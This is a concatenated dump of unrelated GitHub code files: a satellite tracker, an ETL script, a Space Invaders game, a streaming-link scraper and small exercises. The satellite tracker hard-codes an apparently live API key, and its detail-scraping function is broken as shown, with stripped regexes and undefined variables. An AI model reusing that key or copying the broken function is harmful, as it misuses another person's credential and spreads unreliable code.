'aparc.a2009s+aseg' # parcellation/anatomical segmentation atlas\n labels = get_elec_volume_labels(sub, subj_dir)\n\n new_labels = OrderedDict()\n if picks is None:\n picks = info.ch_names\n\n bad_words = ('Unknown', 'unknown', 'hypointensities')\n for p in picks:\n i = 2\n label = labels.T[p].T\n while ((\"White-Matter\" in label[i] and label[i + 1] < 0.8)\n or (any(w in label[i] for w in bad_words) and label[\n i + 1] < 1)):\n if (i + 2) <= len(label.T):\n break\n elif label[i + 2].isspace():\n break\n i += 2\n new_labels[p] = label[i]\n return new_labels\n\n\nif __name__ == \"__main__\":\n from ieeg.io import get_data\n from os import path\n\n HOME = path.expanduser(\"~\")\n LAB_root = path.join(HOME, \"Box\", \"CoganLab\")\n # %% Set up logging\n log_filename = \"output.log\"\n # op.join(LAB_root, \"Aaron_test\", \"Information.log\")\n mne.set_log_file(log_filename,\n \"%(levelname)s: %(message)s - %(asctime)s\",\n overwrite=True)\n mne.set_log_level(\"INFO\")\n TASK = \"SentenceRep\"\n sub_num = 59\n layout = get_data(TASK, root=LAB_root)\n subj_dir = op.join(LAB_root, \"ECoG_Recon_Full\")\n sub_pad = \"D\" + str(sub_num).zfill(4)\n # sub = \"D{}\".format(sub_num)\n\n # filt = raw_from_layout(layout.derivatives['clean'], subject=sub_pad,\n # extension='.edf', desc='clean', preload=False)\n\n ##\n sample_path = mne.datasets.sample.data_path()\n subjects_dir = sample_path / \"subjects\"\n\n brain = plot_subj(\"D29\")\n # plot_on_average(filt)\n # plot_gamma(raw)\n","repo_name":"coganlab/IEEG_Pipelines","sub_path":"ieeg/viz/mri.py","file_name":"mri.py","file_ext":"py","file_size_in_byte":22412,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7810445688","text":"'''\ndef translate(img, key):\n if key == \"up\":\n size = len(img.pop(0))\n img.append([0]*size)\n return img\n elif key == \"down\":\n size = len(img.pop(-1))\n img.insert(0, [0]*size)\n return img\n elif key == \"left\":\n for x in range(len(img)):\n img[x].pop(0)\n img[x].append(0)\n return img\n elif key == \"right\":\n for x in range(len(img)):\n img[x].pop(-1)\n img[x].insert(0, 0)\n return img\ndef overlap(img1, img2):\n count = 0\n for x in range(len(img1)):\n for y in range(len(img2)):\n if img1[x][y] == 1 and img1[x][y] == img2[x][y]:\n count+=1\n return count\n\ndef largestOverlap(img1, img2, max_num):\n trls = []\n olap = []\n trls.append(translate(img1, 'up'))\n trls.append(translate(img1, 'down'))\n trls.append(translate(img1, 'left'))\n trls.append(translate(img1, 'right'))\n olap.append(overlap(trls[0], img2))\n olap.append(overlap(trls[1], img2))\n olap.append(overlap(trls[2], img2))\n olap.append(overlap(trls[3], img2))\n max_key = olap.index(max(olap))\n if olap[max_key] > max_num:\n largestOverlap(trls[max_key] ,img2, max_num)\n else:\n return max_num\n'''\ndef largestOverlap(img1, img2):\n dimensions = len(img1)\n def shift_count(x_shift, y_shift, img1, img2):\n l_shitft_count, r_shift_count = 0, 0\n for x1, x2 in enumerate(range(y_shift,dimensions)):\n for y1, y2 in enumerate(range(x_shift,dimensions)):\n if img1[x2][y2] == 1 and img1[x2][y2] == img2[x1][y1]:\n l_shitft_count +=1\n if img1[x2][y1] == 1 and img1[x2][y1] == img2[x1][y2]:\n r_shift_count +=1\n return(max(l_shitft_count, r_shift_count))\n max_nums = 0\n for y in range(0,dimensions):\n for x in range(0,dimensions):\n max_nums= max(max_nums, shift_count(x, y, img1, img2))\n max_nums= max(max_nums, shift_count(x, y, img2, img1))\n return max_nums\n\n\nimg1 = [[1,1,0],\n [0,1,0],\n [0,1,0]]\nimg2 = [[0,0,0],\n [0,1,1],\n [0,0,1]]\n\nprint(largestOverlap(img1, img2))","repo_name":"cookiewho/IPS_Workshop_2020","sub_path":"4_ImageOverlap.py","file_name":"4_ImageOverlap.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72093734865","text":"import sys\nimport os\nimport re\nimport json\nimport requests\nimport geocoder\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom PyQt5 import QtWebEngineWidgets\nfrom PyQt5.QtWebEngineWidgets import QWebEngineSettings\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QAbstractItemView, QVBoxLayout, QHBoxLayout, QGridLayout, QTableWidgetItem, QLineEdit, QComboBox, QLabel, QSplashScreen, QSpacerItem, QSizePolicy, QFrame, QCheckBox, QCompleter, QTableWidget, QPlainTextEdit\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import * \nimport matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nimport operator\nfrom functools import reduce\n\ndefault_norad_id = 25544\ndef generateMap(norad_id):\n string = '''\n \n \n \n
\n \n \n
\n '''.format(norad_id)\n\n with open('map.html', 'w') as file:\n file.write(string)\n\ngenerateMap(default_norad_id)\n\nn2yo_API_key = \"HMD6AC-Q39DWN-F3S3XJ-5215\"\n\nsatellite_name_id_df = pd.read_csv(\"sat_name_id_file.csv\")\nsatellite_name_id_df[\"Combined\"] = satellite_name_id_df['OBJECT_NAME'].astype(str) + \" - \" + satellite_name_id_df[\"NORAD_CAT_ID\"].astype(str)\ncombined = list(satellite_name_id_df[\"Combined\"])\n\nclass MplCanvas(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n super(MplCanvas, self).__init__(fig)\n\ndef get_sat_details(link):\n response = requests.get(link)\n content = response.content.decode('utf-8')\n\n with open('n2yo.txt', 'w') as f:\n f.write(content)\n\n with open('n2yo.txt', 'r') as f:\n content = f.read()\n\n soup = BeautifulSoup(content, 'html.parser')\n sat_description = soup.find(id=\"satinfo\").find_all(\"br\")[-1].next_sibling\n\n match_sat_name = re.search(r'

(.*?)

', content)\n match_norad_id = re.search(r'NORAD ID\\s*:\\s*(\\d+)\\s*Int\\'l Code\\s*:\\s*(.+)\\s*Period\\s*:\\s*(.+)\\s*Launch site\\s*:\\s*(.*?)\\s*
', content)\n\n if match_sat_name and match_norad_id and match_int_code and match_period and launch_site:\n return sat_description, match_sat_name.group(1), int(match_norad_id.group(1)), match_int_code.group(1), match_period.group(1), launch_site.group(1)\n else:\n return None, None, None, None, None, None\n\ndef obtainData(sat_id): \n userLocation = geocoder.ip('me')\n data = requests.get(\"https://api.n2yo.com/rest/v1/satellite/positions/{0}/{1}/{2}/0/10800/&apiKey={3}\".format(sat_id, userLocation.lat, userLocation.lng, n2yo_API_key))\n data = data.text\n obj = json.loads(data)\n sat_location_df = pd.json_normalize(obj['positions'])\n json_formatted_str = json.dumps(obj, indent= 6)\n with open(\"location.json\", \"w\") as outfile:\n outfile.write(json_formatted_str)\n\n sat_latitudes = sat_location_df['satlatitude'].values.tolist()\n sat_longitudes = sat_location_df['satlongitude'].values.tolist()\n sat_altitude = sat_location_df['sataltitude'].values.tolist()\n\n return sat_latitudes, sat_longitudes, sat_altitude\n\nclass Main(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('SatSpy 1.0')\n generateMap(25544)\n CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))\n self.map_view = os.path.join(CURRENT_DIR, \"map.html\")\n\n self.web = QtWebEngineWidgets.QWebEngineView()\n self.web.page().settings().setAttribute(QWebEngineSettings.ShowScrollBars, False)\n self.web.load(QtCore.QUrl.fromLocalFile(self.map_view))\n self.web.resize(200, 600)\n\n self.exitBtn = QPushButton('Exit', self)\n self.exitBtn.resize(self.exitBtn.sizeHint())\n self.exitBtn.clicked.connect(self.close)\n\n self.searchBtn = QPushButton('Search', self)\n self.searchBtn.resize(self.searchBtn.sizeHint())\n self.searchBtn.clicked.connect(self.searchButtonFunc)\n\n searchBox_Layout = QVBoxLayout()\n horizontalLine = QLabel(\"\")\n horizontalLine.setFrameStyle(QFrame.HLine)\n self.satSearchBox = QLineEdit()\n sat_name_id_completer = QCompleter(combined)\n sat_name_id_completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)\n\n searchbox_grid_layout = QGridLayout()\n searchbox_grid_layout.addWidget(self.satSearchBox, 1, 0)\n searchbox_grid_layout.addWidget(self.searchBtn, 1, 1)\n self.satSearchBox.setCompleter(sat_name_id_completer)\n self.description_label = QLabel(\"Satellite Description: \")\n self.description_box = QPlainTextEdit(self)\n self.description_box.insertPlainText(\"\")\n self.description_box.setReadOnly(True)\n self.description_box.toPlainText()\n searchBox_Layout.addWidget(QLabel(\"Find a satellite by Name or ID: \"))\n searchBox_Layout.addLayout(searchbox_grid_layout)\n verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.table = QTableWidget(5, 2)\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.table.verticalHeader().setVisible(False)\n self.table.horizontalHeader().setVisible(False)\n self.table.horizontalHeader().resizeSection(0, 100)\n self.table.horizontalHeader().resizeSection(1, 130)\n self.table.setItem(0, 0, QTableWidgetItem(\"Name:\"))\n self.table.item(0, 0).setFlags(Qt.NoItemFlags)\n self.table.item(0, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(0, 1, QTableWidgetItem(\"\"))\n self.table.item(0, 1).setFlags(Qt.NoItemFlags)\n self.table.item(0, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(1, 0, QTableWidgetItem(\"NORAD ID:\"))\n self.table.item(1, 0).setFlags(Qt.NoItemFlags)\n self.table.item(1, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(1, 1, QTableWidgetItem(\"\"))\n self.table.item(1, 1).setFlags(Qt.NoItemFlags)\n self.table.item(1, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(2, 0, QTableWidgetItem(\"Int'l Code:\"))\n self.table.item(2, 0).setFlags(Qt.NoItemFlags)\n self.table.item(2, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(2, 1, QTableWidgetItem(\"\"))\n self.table.item(2, 1).setFlags(Qt.NoItemFlags)\n self.table.item(2, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(3, 0, QTableWidgetItem(\"Period:\"))\n self.table.item(3, 0).setFlags(Qt.NoItemFlags)\n self.table.item(3, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(3, 1, QTableWidgetItem(\"\"))\n self.table.item(3, 1).setFlags(Qt.NoItemFlags)\n self.table.item(3, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(4, 0, QTableWidgetItem(\"Launch site:\"))\n self.table.item(4, 0).setFlags(Qt.NoItemFlags)\n self.table.item(4, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(4, 1, QTableWidgetItem(\"\"))\n self.table.item(4, 1).setFlags(Qt.NoItemFlags)\n self.table.item(4, 1).setForeground(QBrush(QColor(255, 255, 255)))\n\n left_Grid_Layout = QGridLayout()\n left_Grid_Layout.addLayout(searchBox_Layout, 1, 0, QtCore.Qt.AlignTop)\n left_Grid_Layout.addWidget(horizontalLine, 2, 0)\n left_Grid_Layout.addWidget(self.description_label, 3, 0)\n left_Grid_Layout.addWidget(self.description_box, 4, 0)\n left_Grid_Layout.addWidget(self.table, 5, 0)\n left_Grid_Layout.addItem(verticalSpacer, 6, 0)\n left_Grid_Layout.addWidget(self.exitBtn, 7, 0)\n left_Grid_Layout.setSpacing(15)\n\n h_Layout = QHBoxLayout(self)\n h_Layout.addLayout(left_Grid_Layout)\n h_Layout.addWidget(self.web, 3)\n\n def searchButtonFunc(self):\n sat_details = self.satSearchBox.text()\n sat_details = sat_details.split(' - ')\n sat_latitude, sat_longitude, sat_altitude = obtainData(sat_details[1])\n def countList(lst1, lst2):\n return reduce(operator.add, zip(lst1, lst2))\n sat_telemetry = countList(sat_latitude, sat_longitude)\n sat_telemetry = [sat_telemetry[idx:idx+2] for idx in range(0, len(sat_telemetry), 2)]\n with open(\"telemetry.txt\", \"w\") as file:\n for element in sat_telemetry:\n file.write(str(element) + \",\" + \"\\n\")\n with open(\"altitudes.txt\", \"w\") as file:\n for element in sat_altitude:\n file.write(str(element) + \",\" + \"\\n\")\n\n sat_description, sat_name, norad_id, int_code, sat_period, launch_site = get_sat_details(\"https://www.n2yo.com/satellite/?s={0}\".format(sat_details[1]))\n print(sat_name, norad_id, int_code, sat_period, launch_site)\n\n generateMap(sat_details[1])\n self.web.load(QtCore.QUrl.fromLocalFile(self.map_view))\n self.description_box.setPlainText(\"{0}\".format(sat_description))\n self.table.item(0, 1).setText(\"{0}\".format(sat_name))\n self.table.item(1, 1).setText(\"{0}\".format(norad_id))\n self.table.item(2, 1).setText(\"{0}\".format(int_code))\n self.table.item(3, 1).setText(\"{0}\".format(sat_period))\n self.table.item(4, 0).setTextAlignment(QtCore.Qt.AlignTop)\n self.table.item(4, 1).setText(\"{0}\".format(launch_site))\n self.table.resizeRowsToContents()\n print(sat_description)\n\napp = QApplication(sys.argv)\nmain = Main()\nmain.show()\nmain.setFixedWidth(1142)\nmain.setFixedHeight(730)\napp.exec_()","repo_name":"MinaBasem/SatSpy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1202315490","text":"import os\nimport imageio\n\n# Directory containing the PNG files\ndirectory = 'images/'\n\n# Create a list of file names in the directory\nfile_names = sorted(os.listdir(directory))\n\n# Initialize the video writer\noutput_file = 'Hy_video.mp4'\nwriter = imageio.get_writer(output_file, fps=30) # Adjust the frame rate (fps) as needed\n\n# Loop through the file names and add frames to the video\nfor file_name in file_names:\n # Check if the file is a PNG file\n if file_name.endswith('.png'):\n file_path = os.path.join(directory, file_name)\n\n # Read the PNG file and add it as a frame in the video\n image = imageio.imread(file_path)\n writer.append_data(image)\n\n# Close the video writer\nwriter.close()\n\nprint(f'Video saved: {output_file}')\n","repo_name":"lukebodm/EM_nodal_DG","sub_path":"video_plotter.py","file_name":"video_plotter.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41528250753","text":"#!/usr/bin/env python3\n# Created by: Katie G\n# Created on: October 13th, 2022\n# This program gets an integer from\n# the user and checks to see if it is\n# positive, negative, or zero using\n# an if.. else if.. else statement.\n\n# this function will get the integer,\n# then check to see if it is positive,\n# negative, or zero.\ndef main():\n # getting the integer from the user\n user_int = int(input(\"Hello :) Integer please :) \"))\n\n # if.. else if.. else statement to check\n # if user int is positive, negative or zero.\n if user_int >= 1:\n print(\"Oh. Your integer ({}) is positive.\".format(user_int))\n elif user_int <= -1:\n print(\"Oh. Your integer ({}) is negative.\".format(user_int))\n else:\n print(\"Oh. Your integer ({}) is zero.\".format(user_int))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ICS3U-Programming-Katie-G/Unit3-04-Python","sub_path":"integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26403930192","text":"from ffgeom import Point, Segment\n\n\ndef maxdist(points):\n ((p0x, p0y), (p1x, p1y), (p2x, p2y), (p3x, p3y)) = points\n p0 = Point(p0x, p0y)\n p1 = Point(p1x, p1y)\n p2 = Point(p2x, p2y)\n p3 = Point(p3x, p3y)\n\n s1 = Segment(p0, p3)\n return max(s1.distanceToPoint(p1), s1.distanceToPoint(p2))\n\n\ndef cspsubdiv(csp, flat):\n for sp in csp:\n subdiv(sp, flat)\n\n\ndef subdiv(sp, flat, i=1):\n while i < len(sp):\n p0 = sp[i - 1][1]\n p1 = sp[i - 1][2]\n p2 = sp[i][0]\n p3 = sp[i][1]\n\n b = (p0, p1, p2, p3)\n m = maxdist(b)\n if m <= flat:\n i += 1\n else:\n one, two = beziersplitatt(b, 0.5)\n sp[i - 1][2] = one[1]\n sp[i][0] = two[2]\n p = [one[2], one[3], two[1]]\n sp[i:1] = [p]\n\n\ndef tpoint(point1, point2, t):\n (x1, y1) = point1\n (x2, y2) = point2\n return x1 + t * (x2 - x1), y1 + t * (y2 - y1)\n\ndef beziersplitatt(points, t):\n ((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)) = points\n m1 = tpoint((bx0, by0), (bx1, by1), t)\n m2 = tpoint((bx1, by1), (bx2, by2), t)\n m3 = tpoint((bx2, by2), (bx3, by3), t)\n m4 = tpoint(m1, m2, t)\n m5 = tpoint(m2, m3, t)\n m = tpoint(m4, m5, t)\n\n return ((bx0, by0), m1, m4, m), (m, m5, m3, (bx3, by3))\n\n","repo_name":"santhoshtr/hand","sub_path":"training/cspsubdiv.py","file_name":"cspsubdiv.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8567325753","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"\n Description: This function is responsible for reading the JSON file in the given directory as a dataframe,\n and then inserting the first record of the song data and artist data to the songs and artists tables respectively.\n\n Arguments:\n cur: the cursor object.\n filepath: log data or song data file path.\n\n Returns:\n None\n \"\"\"\n # open song file\n df = pd.read_json(filepath, lines=True)\n\n # insert song record\n song_data = df[['song_id', 'title', 'artist_id', 'year', 'duration']].values[0].tolist()\n cur.execute(song_table_insert, song_data)\n \n # insert artist record\n artist_data = df[['artist_id', 'artist_name', 'artist_location', 'artist_latitude', 'artist_longitude']].values[0].tolist()\n cur.execute(artist_table_insert, artist_data)\n\n\ndef process_log_file(cur, filepath):\n \"\"\"\n Description: This function is responsible for reading the JSON file in the given directory as a dataframe, filtering the dataframe to include only\n the records matching the NextSong page value, creating different time granurality features from the timestamp feature\n and then inserting and loading the relevant dataframe features into their corresponding tables such as songplay and users tables.\n\n Arguments:\n cur: the cursor object.\n filepath: log data or song data file path.\n\n Returns:\n None\n \"\"\"\n \n # open log file\n df = pd.read_json(filepath, lines=True)\n\n # filter by NextSong action\n df = df[df['page'] == 'NextSong']\n\n # convert timestamp column to datetime\n df['ts'] = pd.to_datetime(df['ts'], unit='ms')\n t = df\n t['hour'] = t['ts'].dt.hour\n t['day'] = t['ts'].dt.day\n t['week'] = t['ts'].dt.week\n t['weekday_name'] = t['ts'].dt.weekday_name\n t['month'] = t['ts'].dt.month\n t['year'] = t['ts'].dt.year\n \n # insert time data records\n time_data = ('ts', 'hour', 'day', 'week', 'month', 'year', 'weekday_name')\n column_labels = ('start_time', 'hour', 'day', 'week', 'month', 'year', 'weekday')\n time_df = t[['ts', 'hour', 'day', 'week', 'month', 'year', 'weekday_name']]\n\n for i, row in time_df.iterrows():\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = df[['userId', 'firstName', 'lastName', 'gender', 'level']]\n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # insert songplay records\n for index, row in df.iterrows():\n \n # get songid and artistid from song and artist tables\n cur.execute(song_select, (row.song, row.artist, row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n\n # insert songplay record\n songplay_data = (row.ts, row.userId, row.level, songid, artistid, row.itemInSession, row.location, row.userAgent)\n cur.execute(songplay_table_insert, songplay_data)\n\n\n\ndef process_data(cur, conn, filepath, func):\n \"\"\"\n Description: This function is responsible for looping over all the JSON files in the data directories, calculating the total number of files found\n and applying the func function to all the files listed for the transformation and database insetion purposes.\n\n Arguments:\n cur: the cursor object.\n conn: connection to the database.\n filepath: log data or song data file path.\n func: function that transforms the data and inserts it into the database.\n\n Returns:\n None\n \"\"\"\n \n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n\n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"MustafaAwny/Sparkify-Data-Modeling-with-Postgres-SQL","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34361227260","text":"import sys, math, itertools\nfrom collections import deque, defaultdict, Counter\nsys.setrecursionlimit(10**9)\ndef LI(): return [int(x) for x in sys.stdin.readline().split()]\n\nX = LI()\nX.sort()\nA, B, C = X\n\nif C % 2 == 0:\n print(0)\nelse:\n print(A * B)\n\n\n\n","repo_name":"hk-tech/atcoder","sub_path":"problems/agc004/a/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4137508992","text":"import pygame\nimport random\nimport math\n\n# Initialize pygame\npygame.init()\n\n# Create game screen\nscreen = pygame.display.set_mode((800, 600))\n\n# Background\nbackground = pygame.image.load(\"background.png\")\n\n# Title and Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load(\"icon.png\")\npygame.display.set_icon(icon)\n\n# Player\nplayerImg = pygame.image.load(\"player.png\")\nplayer_x = 370\nplayer_y = 480\nplayer_move = 0\n\n# Enemy\nenemyImg = pygame.image.load(\"enemy.png\")\nenemy_x = random.randint(0, 720)\nenemy_y = random.randint(50, 150)\nenemy_x_move = 2\nenemy_y_move = 20\n\n# Bullet\n\n# Ready - bullet is unseen\n# Fire - bullet is moving\nbulletImg = pygame.image.load(\"bullet.png\")\nbullet_x = 0\nbullet_y = 480\nbullet_x_move = 0\nbullet_y_move = 3\nbullet_state = \"ready\"\n\nscore = 0\n\n# Allows a player to appear on screen\ndef player(x, y):\n screen.blit(playerImg, (x, y))\n\n\n# Allows the enemy to appear on screen\ndef enemy(x, y):\n screen.blit(enemyImg, (x, y))\n\n\ndef fire_bullet(x, y):\n global bullet_state\n bullet_state = \"fire\"\n screen.blit(bulletImg, (x + 16, y + 10))\n\n\ndef isCollision(enemy_x, enemy_y, bullet_x, bullet_y):\n distance = math.sqrt((math.pow(enemy_x - bullet_x, 2)) + (math.pow(enemy_y - bullet_y, 2)))\n if distance < 27:\n return True\n else:\n return False\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n # RGB values\n screen.fill((255, 255, 255))\n # Background image\n screen.blit(background, (0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # If Keystroke is pressed check whether it's right or left\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player_move = -5\n\n if event.key == pygame.K_RIGHT:\n player_move = 5\n\n if event.key == pygame.K_SPACE:\n if bullet_state == \"ready\":\n bullet_x = player_x\n fire_bullet(bullet_x, bullet_y)\n\n # This loop allows the game to know what to do when a key is released\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or pygame.K_RIGHT:\n player_move = 0\n # Checking for player boundary to prevent out of bounds movement\n player_x += player_move\n\n if player_x <= 16:\n player_x = 16\n elif player_x >= 720:\n player_x = 720\n\n # Enemy Movement\n enemy_x += enemy_x_move\n\n if enemy_x <= 16:\n enemy_x_move = 2\n enemy_y += enemy_y_move\n elif enemy_x >= 720:\n enemy_x_move = -2\n enemy_y += enemy_y_move\n\n # Bullet movement\n if bullet_y <= 0:\n bullet_y = 480\n bullet_state = \"ready\"\n\n if bullet_state == \"fire\":\n fire_bullet(bullet_x, bullet_y)\n bullet_y -= bullet_y_move\n\n # Collision\n collision = isCollision(enemy_x, enemy_y, bullet_x, bullet_y)\n if collision:\n bullet_y = 480\n bullet_state = \"ready\"\n score += 1\n print(score)\n enemy_x = random.randint(0, 800)\n enemy_y = random.randint(50, 150)\n\n player(player_x, player_y)\n enemy(enemy_x, enemy_y)\n pygame.display.update()\n","repo_name":"BrianGitahi/SpaceInvaders-Notfinished-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20608664131","text":"\"\"\"Code for scraping from RojaDirecta.\"\"\"\nimport logging\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom streamscrape.utils import get_ip_address\n\nlogger = logging.getLogger(__name__)\n\nHOME = \"http://www.rojadirecta.me\"\n\n\ndef scrape():\n \"\"\"Scrape RojaDirecta.\n\n :return: A list of {\"timestamp\": _, \"url\": _, \"ip\": _}\n \"\"\"\n all_urls = []\n page = requests.get(HOME)\n soup = BeautifulSoup(page.text, \"html.parser\")\n url_table = soup.find(\"div\", id=\"agendadiv\")\n for a in url_table.find_all(\"a\"):\n try:\n href = a.attrs[\"href\"]\n except KeyError:\n continue\n\n # skip p2p acestream urls\n if any(s in href for s in [\"rojadirecta.me\", \"elgoles.me\", \"arenavision.link\"]):\n continue\n\n # Go to the actual URL if rojadirecta wants to redirect\n if href.startswith(\"http://it.rojadirecta.eu/goto/http\"):\n href = href.replace(\"http://it.rojadirecta.eu/goto/\", \"\")\n elif href.startswith(\"http://it.rojadirecta.eu/goto/\"):\n href = href.replace(\"it.rojadirecta.eu/goto/\", \"\")\n\n event_data = {\n \"timestamp\": int(time.time()),\n \"url\": href,\n \"ip\": get_ip_address(href),\n }\n logger.debug(\"RojaDirecta URL data: {}\".format(event_data))\n all_urls.append(event_data)\n\n return all_urls\n","repo_name":"hudson-ayers/safe-sports-streams","sub_path":"src/streamscrape/other/rojadirecta.py","file_name":"rojadirecta.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38276869207","text":"# Wczytaj trzy liczby całkowite a, b, c i sprawdź, która z nich jest największa. W zależności od wyniku wyświetl\n# odpowiedni komunikat. Użyj zagnieżdżeń.\n\ndef get_number_from_user():\n while True:\n user_input = input()\n try:\n value = float(user_input)\n return value\n except ValueError:\n print(\"Podałeś błędną wartość. Wprowadź ponownie liczbę\")\n\n\nprint(\"Wprowadź liczbę a: \")\na = get_number_from_user()\nprint(\"Wprowadź liczbę b: \")\nb = get_number_from_user()\nprint(\"Wprowadź liczbę c: \")\nc = get_number_from_user()\n\nif a == b and b == c:\n print('Wszystkie liczby są równe')\nelif a >= b:\n if a > c:\n print('Liczba a jest największa')\n else:\n print('Liczba c jest największa')\nelif b > a:\n if b > c:\n print('Liczba b jest największa')\n else:\n print('Liczba c jest największa')\n","repo_name":"mohawk76/WizualizacjaDanych2022","sub_path":"lab2/zad 6.py","file_name":"zad 6.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70453658066","text":"print(\"**EJEMPLO 3**\")\nclass apellidos:\n def __init__(self, apellido1, apellido2):\n self.apellido1 = apellido1\n self.apellido2 = apellido2\n\n\nclass profesor:\n sueldoTotal = 0\n def __init__(self, nombre, sueldo, horasExtra, apellidos):\n self.nombre = nombre\n self.sueldo = sueldo\n self.horasExtra = horasExtra\n self.apellidos = apellidos\n\n def calcularSueldoTotal(self):\n self.sueldoTotal = self.sueldo + (self.horasExtra * 11)\n \n\ndef main():\n nombre = \"Arancha Estrella\"\n sueldo = 600\n horasExtra = 10\n apellidosProfesor = apellidos(\"Rosillo\", \"Andagua\")\n profesor1 = profesor(nombre, sueldo, horasExtra, apellidos)\n profesor1.calcularSueldoTotal()\n print(f\"\\nEl profesor {nombre} {apellidosProfesor.apellido1} {apellidosProfesor.apellido2} tiene un sueldo de {sueldo} dólares, considerando las horas extras asciende a {profesor1.sueldoTotal} dólares\\n\")\n \nif __name__ == '__main__':\n main()","repo_name":"ProgOrientadaObjetos-PPA-AA2022/consulta01-grupo006","sub_path":"Ejercicios/Ejemplo3.py","file_name":"Ejemplo3.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14063423321","text":"def linked_list_cycle(head):\n \n if not head:\n return False\n \n slow = head\n fast = head\n \n while not (fast is None or fast.next is None): # understand this properly. you want to fail in the first condition \n #to prevent 2nd condition from executing to prevent None type exception\n #while fast is not None or fast.next is not None: # this is not a correct condition\n slow = slow.next\n fast = fast.next.next \n if slow == fast:\n return True\n return False\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\na = Node('a')\nb = Node('b')\nc = Node('c')\nd = Node('d')\n\na.next = b\nb.next = c\nc.next = d\n\n# a -> b -> c -> d \n\nlinked_list_cycle(a) # Fals","repo_name":"anilsalgaonkar/interviewing","sub_path":"Coding/Linked List/hascycle.py","file_name":"hascycle.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40050367377","text":"import os\nimport time\n\nfrom timeseries.plotly.plot import 